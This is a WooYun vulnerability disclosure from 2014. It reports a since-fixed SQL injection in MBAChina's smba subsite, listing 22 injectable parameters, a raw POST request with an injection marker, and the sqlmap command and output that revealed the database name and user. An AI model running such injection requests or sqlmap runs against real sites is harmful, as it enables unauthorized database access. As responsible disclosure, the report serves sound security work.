当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-076086

漏洞标题:MBAChina某分站SQL注入漏洞

相关厂商:MBAChina

漏洞作者: 老笨蛋

提交时间:2014-09-15 14:14

修复时间:2014-09-22 18:54

公开时间:2014-09-22 18:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-09-15: 细节已通知厂商并且等待厂商处理中
2014-09-18: 厂商已经确认,细节仅向厂商公开
2014-09-22: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

分站注入漏洞

详细说明:

post注入漏洞,有一些地方未过滤
1. http://smba.mbachina.com/Bjtu [email parameter]
2. http://smba.mbachina.com/Bjtu [tel parameter]
3. http://smba.mbachina.com/Bjtu [username parameter]
4. http://smba.mbachina.com/Buct [email parameter]
5. http://smba.mbachina.com/Buct [tel parameter]
6. http://smba.mbachina.com/Buct [username parameter]
7. http://smba.mbachina.com/Cass [email parameter]
8. http://smba.mbachina.com/Cass [tel parameter]
9. http://smba.mbachina.com/Cass [username parameter]
10. http://smba.mbachina.com/Cau [email parameter]
11. http://smba.mbachina.com/Cau [tel parameter]
12. http://smba.mbachina.com/Cau [username parameter]
13. http://smba.mbachina.com/Cupl [email parameter]
14. http://smba.mbachina.com/Cupl [tel parameter]
15. http://smba.mbachina.com/Cupl [username parameter]
16. http://smba.mbachina.com/User/Saveuser [username parameter]
17. http://smba.mbachina.com/bit [email parameter]
18. http://smba.mbachina.com/bit [tel parameter]
19. http://smba.mbachina.com/bit [username parameter]
20. http://smba.mbachina.com/uibe [email parameter]
21. http://smba.mbachina.com/uibe [tel parameter]
22. http://smba.mbachina.com/uibe [username parameter]

漏洞证明:

POST /Buct HTTP/1.1
Host: smba.mbachina.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
Connection: close
Referer: http://smba.mbachina.com/zt/buct/
Content-Type: multipart/form-data; boundary=--------578506529
Content-Length: 708
Cookie: PHPSESSID=7a7l732tbpn53gkukpi5j4k4n7; Hm_lvt_d861a9bfbe27024daed8da584f3e5d94=1409937162,1410181140; CNZZDATA1408427=cnzz_eid%3D1612002769-1409937019-%26ntime%3D1410180998; Hm_lpvt_d861a9bfbe27024daed8da584f3e5d94=1410181151
----------578506529
Content-Disposition: form-data; name="username"
*
----------578506529
Content-Disposition: form-data; name="email"
winter@example.com
----------578506529
Content-Disposition: form-data; name="%e6%8f%90%e4%ba%a4"
%e6%8f%90++%e4%ba%a4
----------578506529
Content-Disposition: form-data; name="tel"
555-555-0199
----------578506529
Content-Disposition: form-data; name="province"
%e5%8c%97%e4%ba%ac
----------578506529
Content-Disposition: form-data; name="realname"
Peter+Test
----------578506529
Content-Disposition: form-data; name="type"
1
----------578506529
Content-Disposition: form-data; name="password"
test@example.com
----------578506529--


sqlmap.py -r test.txt --threads=10 --level=5 --risk=3 --dbms=mysql --current-db --current-user
web application technology: Apache 2.2.23, PHP 5.3.21
back-end DBMS: MySQL >= 5.0.0
available databases [1]:
[*] smba2010
current user: 'smba@localhost'

修复方案:

过虑

版权声明:转载请注明来源 老笨蛋@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-09-18 10:03

厂商回复:

非常感谢您,问题已着手处理,感谢您对我们安全工作的关注。欢迎反馈,我们会有专人跟进处理。

最新状态:

2014-09-22:已修复,谢谢。

漏洞评价:

评论

  1. 2014-09-18 12:08 | 老笨蛋 ( 路人 | Rank:29 漏洞数:8 | 老笨蛋一个)

    得了1rank……聊胜于无……:)